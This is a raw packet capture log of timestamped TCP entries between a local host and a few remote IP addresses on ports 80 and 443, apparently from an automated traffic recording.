                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.687243938 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.687323093 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.687983990 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688050985 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688108921 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688178062 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688627005 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688694954 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688730955 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.688818932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.689419985 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.689485073 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.689521074 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.689610004 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.690207005 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.690278053 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.690320969 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.690406084 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.690989017 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691030979 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691082001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691119909 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691792011 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691833019 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691947937 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.691987038 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.692681074 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.692722082 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.692770004 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.692809105 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.694374084 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.694416046 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.694464922 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.694528103 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.695930958 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.695945978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.695974112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.695985079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.697518110 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.697572947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.697583914 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.697623014 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.699228048 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.699287891 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.699345112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.699384928 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.700781107 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.700835943 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.700866938 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.700907946 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.702286959 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.702341080 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.702384949 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.702426910 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.703931093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.703978062 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.704030037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.704071045 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705539942 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705615997 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705666065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705709934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705934048 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.705945015 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.706006050 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.707010984 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.707068920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.707078934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.707117081 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.708522081 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.708580971 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.708633900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.708678007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710124969 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710171938 CET49882443192.168.2.4142.250.181.65
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710181952 CET44349882142.250.181.65192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710205078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710268974 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.710314035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711590052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711638927 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711658001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711694002 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711958885 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.711997986 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.740370035 CET44349875172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.740510941 CET44349875172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.740559101 CET49875443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.762377977 CET49875443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.762389898 CET44349875172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.762399912 CET49875443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.762404919 CET44349875172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833728075 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833782911 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833839893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833857059 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833883047 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.833894968 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834085941 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834131956 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834194899 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834212065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834239960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834252119 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834395885 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834440947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834661961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834706068 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834794998 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834810972 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834832907 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834836006 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834846020 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.834873915 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835449934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835500956 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835545063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835561037 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835587025 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835611105 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.835973024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836010933 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836054087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836070061 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836095095 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836105108 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836280107 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836327076 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836759090 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836827993 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836863995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836880922 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836908102 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.836920023 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837093115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837136030 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837511063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837554932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837630033 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837646008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837673903 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837685108 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837857008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.837898970 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838330030 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838365078 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838424921 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838440895 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838465929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838475943 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838627100 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.838665009 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839083910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839129925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839188099 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839202881 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839231014 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839246035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839406013 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839448929 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839885950 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839924097 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839967966 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.839983940 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840009928 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840029001 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840181112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840219021 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840671062 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840713024 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840756893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840774059 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840802908 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840821981 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.840981007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841027021 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841434956 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841480017 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841531992 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841548920 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841571093 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841587067 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841780901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.841820955 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842230082 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842271090 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842328072 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842344999 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842369080 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842392921 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842541933 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.842578888 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843019009 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843056917 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843100071 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843123913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843136072 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843159914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843349934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843399048 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843820095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843858957 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843950987 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843966961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.843992949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844001055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844171047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844209909 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844619989 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844656944 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844687939 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844703913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844721079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844739914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844909906 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.844963074 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845366001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845406055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845473051 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845489025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845514059 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845525026 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845695972 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.845732927 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846148968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846189976 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846252918 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846267939 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846292973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846311092 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846482038 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846529007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846941948 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.846995115 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847039938 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847054958 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847081900 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847100019 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847274065 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847317934 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847728968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847769022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847851038 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847867012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847887039 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.847904921 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848051071 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848089933 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848511934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848551989 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848624945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848642111 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848665953 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848680973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848834038 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.848875999 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849292994 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849334002 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849401951 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849419117 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849440098 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849452019 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849652052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.849689960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850086927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850123882 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850176096 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850192070 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850218058 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850228071 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850390911 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.850434065 CET4987280192.168.2.431.41.244.11
